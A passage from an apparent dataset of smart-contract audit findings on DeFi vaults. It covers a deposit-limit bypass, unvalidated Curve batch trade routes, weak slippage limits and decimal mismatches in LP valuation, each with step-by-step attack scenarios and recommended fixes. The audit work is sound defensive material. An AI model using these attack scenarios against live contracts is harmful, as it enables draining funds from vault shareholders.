`maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLet's say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposits amount 51 then it fails since 50+51<=100 is false\\nSo User A transfers amount 50 to another account of his\\nNow when User A deposits, it does not fail since `0+51<=100`",Issue maxTrainingDeposit can be bypassed\\nIf user specific limit is required then transfer should be checked as below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\n,User can bypass maxTrainingDeposit and deposit more than allowed,"```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n" +Risk of reward tokens being sold by malicious users under certain conditions,high,"Due to the lack of validation of the selling token within the Curve adaptors, there is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. 
if reward tokens equal to primary/secondary tokens OR a new exploit is found in other parts of the code).\\nFor a `EXACT_IN_SINGLE` trade within the Curve adaptors, the `from` and `to` addresses of the `exchange` function are explicitly set `to` `trade.sellToken` and `trade.buyToken` respectively. Thus, the swap is restricted `to` only `trade.sellToken` and `trade.buyToken`, which points `to` either the primary or secondary token of the pool. This prevents other tokens that reside in the vault `from` being swapped out.\\nHowever, this measure was not applied to the `EXACT_IN_BATCH` trade as it ignores the `trade.sellToken` and `trade.buyToken` , and allow the caller to define arbitrary `data.route` where the first route (_route[0]) and last route (_route[last_index]) could be any token.\\nThe vault will hold the reward tokens (CRV, CVX, LDO) when the vault administrator claims the rewards or a malicious user claims the rewards on behalf of the vault by calling Convex's getReward function.\\nAssume that attacker is faster than the admin calling the reinvest function. There is a possibility that an attacker executes a `EXACT_IN_BATCH` trade and specifies the `_route[0]` as one of the reward tokens residing on the vault and swaps away the reward tokens during depositing (_tradePrimaryForSecondary) or redemption (_sellSecondaryBalance). 
In addition, an attacker could also sell away the Convex deposit tokens if a new exploit is found.\\nIn addition, the vault also holds Convex deposit tokens, which represent assets held by the vault.\\nThis issue affects the in-scope `CurveV2Adapter` and `CurveAdapter` since they do not validate the `data.route` provided by the users.\\nCurveV2Adapter\\n```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n\\nCurveAdapter\\n```\\nFile: CurveAdapter.sol\\n function _exactInBatch(Trade memory trade) internal view returns (bytes memory executionCallData) {\\n CurveBatchData memory data = abi.decode(trade.exchangeData, (CurveBatchData));\\n\\n return abi.encodeWithSelector(\\n ICurveRouter.exchange.selector,\\n trade.amount,\\n data.route,\\n data.indices,\\n trade.limit\\n );\\n }\\n```\\n\\nFollowing are some examples of where this vulnerability could potentially be exploited. 
Assume a vault that supports the CurveV2's ETH/stETH pool.\\nPerform the smallest possible redemption to trigger the `_sellSecondaryBalance` function. Configure the `RedeemParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the primary token (ETH). This will cause the `finalPrimaryBalance` to increase by the number of incoming primary tokens (ETH), thus inflating the number of primary tokens redeemed.\\nPerform the smallest possible deposit to trigger the `_tradePrimaryForSecondary`. Configure `DepositTradeParams` to swap the reward token (CRV, CVX, or LDO) or Convex Deposit token for the secondary tokens (stETH). This will cause the `secondaryAmount` to increase by the number of incoming secondary tokens (stETH), thus inflating the number of secondary tokens available for the deposit.\\nUpon further investigation, it was observed that the vault would only approve the exchange to pull the `trade.sellToken`, which points to either the primary token (ETH) or secondary token (stETH). Thus, the reward tokens (CRV, CVX, or LDO) or Convex deposit tokens cannot be sent to the exchanges. Thus, the vault will not be affected if none of the reward tokens/Convex Deposit tokens equals the primary or secondary token.\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? 
trade.amount : trade.limit;\\n address sellToken = trade.sellToken;\\n // approve WETH instead of ETH for ETH trades if\\n // spender != address(0) (checked by the caller)\\n if (sellToken == Constants.ETH_ADDRESS) {\\n sellToken = address(Deployments.WETH);\\n }\\n IERC20(sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\nHowever, there might be some Curve Pools or Convex's reward contracts whose reward tokens are similar to the primary or secondary tokens of the vault. If the vault supports those pools, the vault will be vulnerable. In addition, the reward tokens of a Curve pool or Convex's reward contracts are not immutable. It is possible for the governance to add a new reward token that might be the same as the primary or secondary token.","It is recommended to implement additional checks when performing a `EXACT_IN_BATCH` trade with the `CurveV2Adapter` or `CurveAdapter` adaptor. The first item in the route must be the `trade.sellToken`, and the last item in the route must be the `trade.buyToken`. This will restrict the `trade.sellToken` to the primary or secondary token, and prevent reward and Convex Deposit tokens from being sold (Assuming primary/secondary token != reward tokens).\\n```\\nroute[0] == trade.sellToken\\nroute[last index] == trade.buyToken\\n```\\n\\nThe vault holds many Convex Deposit tokens (e.g. cvxsteCRV). A risk analysis of the vault shows that the worst thing that could happen is that all the Convex Deposit tokens are swapped away if a new exploit is found, which would drain the entire vault. For defense-in-depth, it is recommended to check that the selling token is not a Convex Deposit token under any circumstance when using the trade adaptor.\\nThe trade adaptors are one of the attack vectors that the attacker could potentially use to move tokens out of the vault if any exploit is found. 
Thus, they should be locked down or restricted where possible.\\nAlternatively, consider removing the `EXACT_IN_BATCH` trade function from the affected adaptors to reduce the attack surface if the security risk of this feature outweighs the benefit of the batch function.","There is a risk that the reward tokens or Convex deposit tokens of the vault are sold by malicious users under certain conditions (e.g. if reward tokens are equal to primary/secondary tokens OR a new exploit is found in other parts of the code), thus potentially draining assets from the vault.","```\\nFile: CurveV2Adapter.sol\\n function getExecutionData(address from, Trade calldata trade)\\n internal view returns (\\n address spender,\\n address target,\\n uint256 msgValue,\\n bytes memory executionCallData\\n )\\n {\\n if (trade.tradeType == TradeType.EXACT_IN_SINGLE) {\\n CurveV2SingleData memory data = abi.decode(trade.exchangeData, (CurveV2SingleData));\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange.selector,\\n data.pool,\\n _getTokenAddress(trade.sellToken),\\n _getTokenAddress(trade.buyToken),\\n trade.amount,\\n trade.limit,\\n address(this)\\n );\\n } else if (trade.tradeType == TradeType.EXACT_IN_BATCH) {\\n CurveV2BatchData memory data = abi.decode(trade.exchangeData, (CurveV2BatchData));\\n // Array of pools for swaps via zap contracts. 
This parameter is only needed for\\n // Polygon meta-factories underlying swaps.\\n address[4] memory pools;\\n executionCallData = abi.encodeWithSelector(\\n ICurveRouterV2.exchange_multiple.selector,\\n data.route,\\n data.swapParams,\\n trade.amount,\\n trade.limit,\\n pools,\\n address(this)\\n );\\n```\\n" +Slippage/Minimum amount does not work during single-side redemption,high,"The slippage or minimum amount of tokens to be received is set to a value much smaller than expected due to the use of `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount on behalf of the callers during a single-sided redemption. As a result, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `Curve2TokenConvexHelper._executeSettlement` function is called by the following functions:\\n`Curve2TokenConvexHelper.settleVault`\\n`Curve2TokenConvexHelper.settleVault` function is called within the `Curve2TokenConvexVault.settleVaultNormal` and `Curve2TokenConvexVault.settleVaultPostMaturity` functions\\n`Curve2TokenConvexHelper.settleVaultEmergency`\\n`Curve2TokenConvexHelper.settleVaultEmergency` is called by `Curve2TokenConvexVault.settleVaultEmergency`\\nIn summary, the `Curve2TokenConvexHelper._executeSettlement` function is called during vault settlement.\\nAn important point to note here is that within the `Curve2TokenConvexHelper._executeSettlement` function, the `params.minPrimary` and `params.minSecondary` are automatically computed and overwritten by the `TwoTokenPoolUtils._getMinExitAmounts` function (Refer to Line 124 below). Therefore, if the caller attempts to define the `params.minPrimary` and `params.minSecondary`, they will be discarded and overwritten. 
The `params.minPrimary` and `params.minSecondary` is for slippage control when redeeming the Curve's LP tokens.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\nThe `TwoTokenPoolUtils._getMinExitAmounts` function calculates the minimum amount on the share of the pool with a small discount.\\nAssume a Curve Pool with the following configuration:\\nConsist of two tokens (DAI and USDC). 
DAI is primary token, USDC is secondary token.\\nPool holds 200 US Dollars worth of tokens (50 DAI and 150 USDC).\\nDAI <> USDC price is 1:1\\ntotalSupply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (50 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 50 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 24.9375 DAI\\n\\nminSecondary = same calculation = 74.8125 USDC\\n```\\n\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `24.9375 DAI` as `params.minPrimary` and `74.8125 USDC` as `params.minSecondary`.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen settling the vault, it is possible to instruct the vault to redeem the Curve's LP tokens single-sided 
or proportionally. Settle vault functions will trigger a chain of functions that will eventually call the `Curve2TokenConvexHelper._unstakeAndExitPool` function that is responsible for redeeming the Curve's LP tokens.\\nWithin the `Curve2TokenConvexHelper._unstakeAndExitPool` function, if the `params.secondaryTradeParams.length` is zero, the redemption will be single-sided (refer to Line 242 below). Otherwise, the redemption will be executed proportionally (refer to Line 247 below). For a single-sided redemption, only the `params.minPrimary` will be used.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _unstakeAndExitPool(\\n Curve2TokenPoolContext memory poolContext,\\n ConvexStakingContext memory stakingContext,\\n uint256 poolClaim,\\n RedeemParams memory params\\n ) internal returns (uint256 primaryBalance, uint256 secondaryBalance) {\\n // Withdraw pool tokens back to the vault for redemption\\n bool success = stakingContext.rewardPool.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n if (!success) revert Errors.UnstakeFailed();\\n\\n if (params.secondaryTradeParams.length == 0) {\\n // Redeem single-sided\\n primaryBalance = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity_one_coin(\\n poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary\\n );\\n } else {\\n // Redeem proportionally\\n uint256[2] memory minAmounts;\\n minAmounts[poolContext.basePool.primaryIndex] = params.minPrimary;\\n minAmounts[poolContext.basePool.secondaryIndex] = params.minSecondary;\\n uint256[2] memory exitBalances = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity(\\n poolClaim, minAmounts\\n );\\n\\n (primaryBalance, secondaryBalance) \\n = (exitBalances[poolContext.basePool.primaryIndex], exitBalances[poolContext.basePool.secondaryIndex]);\\n }\\n }\\n```\\n\\nAssume that the caller decided to perform a single-sided redemption of 50 LP Pool Tokens, using the earlier example. 
In this case,\\n`poolClaim` = 50 LP Pool Tokens\\n`params.minPrimary` = 24.9375 DAI\\n`params.minSecondary` = 74.8125 USDC\\nThe data passed into the `remove_liquidity_one_coin` will be as follows:\\n```\\n@notice Withdraw a single coin from the pool\\n@param _token_amount Amount of LP tokens to burn in the withdrawal\\n@param i Index value of the coin to withdraw\\n@param _min_amount Minimum amount of coin to receive\\n@return Amount of coin received\\ndef remove_liquidity_one_coin(\\n _token_amount: uint256,\\n i: int128,\\n _min_amount: uint256\\n) -> uint256:\\n```\\n\\n```\\nremove_liquidity_one_coin(poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary);\\nremove_liquidity_one_coin(50 LP_TOKEN, Index 0=DAI, 24.9375 DAI);\\n```\\n\\nAssume the pool holds 200 US dollars worth of tokens (50 DAI and 150 USDC), and the total supply is 100 LP Tokens. The pool's state is imbalanced, so any trade will result in significant slippage.\\nIntuitively (ignoring the slippage & fee), redeeming 50 LP Tokens should return approximately 100 US dollars worth of tokens, which means around 100 DAI. Thus, the slippage or minimum amount should ideally be around 100 DAI (+/- 5%).\\nHowever, the trade will be executed in the above example even if the vault receives only 25 DAI because the `params.minPrimary` is set to `24.9375 DAI`. This could result in a loss of around 75 DAI due to slippage (about 75% slippage rate) in the worst-case scenario.","When performing a single-side redemption, avoid using the `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount of tokens to receive on behalf of the caller. Instead, give the caller the flexibility to define the slippage (params.minPrimary). 
To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a single-side trade (remove_liquidity_one_coin) is to call the Curve Pool's `calc_withdraw_one_coin` function off-chain to calculate the amount received when withdrawing a single LP Token, and then apply an acceptable discount.\\nNote that the `calc_withdraw_one_coin` function cannot be used solely on-chain for computing the minimum amount because the result can be manipulated since it uses spot balances for computation.","The slippage or minimum amount of tokens to be received is set to a value much smaller than expected. Thus, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.","```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n" +Reinvest will return sub-optimal return if the pool is imbalanced,high,"Reinvesting only allows proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. 
This result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.\\nDuring reinvest rewards, the vault will ensure that the amount of primary and secondary tokens deposited is of the right proportion per the comment in Line 163 below.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nThe `Curve2TokenConvexHelper.reinvestReward` function will internally call the `Curve2TokenPoolUtils._checkPrimarySecondaryRatio`, which will check that the primary and secondary tokens deposited are of the right proportion.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n 
strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n\\nThis concept of proportional join appears to be taken from the design of earlier Notional's Balancer leverage vaults. For Balancer Pools, it is recommended to join with all the pool's tokens in exact proportions to minimize the price impact of the join (Reference).\\nHowever, the concept of proportional join to minimize slippage does not always hold for Curve Pools as they operate differently.\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). 
On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.","Consider removing the `_checkPrimarySecondaryRatio` function from the `_validateSpotPriceAndPairPrice` function to give the callers the option to deposit the reward tokens in a ""non-proportional"" manner if a Curve Pool becomes imbalanced so that the deposit penalty could be minimized or the deposit bonus can be exploited to increase the return.","There is no guarantee that a Curve Pool will always be balanced. 
Historically, there are multiple instances where the largest Curve pool (stETH/ETH) becomes imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the trade resulting in fewer tokens than possible due to the deposit penalty. In addition, the trade also misses out on the potential gain from the deposit bonus.\\nThe side-effect is that reinvesting the reward tokens will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.","```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n" +Curve vault will undervalue or overvalue the LP Pool tokens if it comprises tokens with different decimals,high,"A Curve vault that comprises tokens with different decimals will undervalue or overvalue the LP Pool tokens. As a result, users might be liquidated prematurely or be able to borrow more than they are allowed. 
Additionally, the vault settlement process might break.\\nThe `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function, which is utilized by the Curve vault, is used to compute the total value of the LP Pool tokens (poolClaim) denominated in the primary token.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n\\nIf a leverage vault supports a Curve Pool that contains two tokens with different decimals, the math within the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function would not work, and the value returned from it will be incorrect. Consider the following two scenarios:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 
6)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is DAI.\\nDAI's decimals are 18, while USDC's decimals are 6.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 DAI and 100 USDC\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nThe `secondaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nNext, the code logic attempts to value the secondary balance (50 USDC) in terms of the primary token (DAI) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 USDC * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n```\\n\\n50 USDC should be worth 50 DAI (50 * 10^18). 
However, the `secondaryAmountInPrimary` shows that it is only worth 0.00000000005 DAI (50 * 10^6).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] * 10^18 / 10^18\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] // cancel out the 10^18\\nprimaryAmount = 50 DAI + 0.00000000005 DAI = 50.00000000005 DAI\\n```\\n\\n50 LP Pool tokens should be worth 100 DAI. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is only worth 50.00000000005 DAI, which undervalues the LP Pool tokens.\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is USDC.\\nUSDC's decimals are 6, while DAI's decimals are 18.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 USDC and 100 DAI\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nThe `secondaryBalance` will be `50 DAI`. 
`50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nNext, the code logic attempts to value the secondary balance (50 DAI) in terms of the primary token (USDC) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 DAI * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n```\\n\\n50 DAI should be worth 50 USDC (50 * 10^6). However, the `secondaryAmountInPrimary` shows that it is worth 50,000,000,000,000 USDC (50 * 10^18).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] * 10^6 / 10^18\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] / 10^12\\nprimaryAmount = 50,000,000.00005 = 50 million\\n```\\n\\n50 LP Pool tokens should be worth 100 USDC. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is worth 50 million USDC, which overvalues the LP Pool tokens.\\nIn summary, if a leverage vault has two tokens with different decimals:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will undervalue the LP Pool tokens\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will overvalue the LP Pool tokens","When valuing the secondary balance in terms of the primary token using the oracle price, the result should be scaled up or down the decimals of the primary token accordingly if the decimals of the two tokens are different.\\nThe root cause of this issue is in the following portion of the code, which attempts to add the `primaryBalance` and `secondaryAmountInPrimary` before multiplying with the `primaryPrecision`. 
